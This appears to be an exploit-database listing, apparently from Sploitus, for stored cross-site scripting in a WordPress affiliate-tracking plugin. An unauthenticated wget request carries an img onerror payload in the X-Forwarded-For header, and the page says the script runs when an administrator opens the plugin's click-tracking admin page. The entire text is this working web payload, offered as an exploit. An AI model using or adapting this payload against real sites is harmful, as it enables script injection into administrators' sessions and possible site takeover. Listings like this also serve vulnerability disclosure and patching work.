Share
## https://sploitus.com/exploit?id=WPEX-ID:D4EDB5F2-AA1B-4E2D-ABB4-76C46DEF6C6E
As unauthenticated: wget "https://example.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-

The XSS will be triggered when an admin access http://example.com/wp-admin/admin.php?page=wpam-clicktracking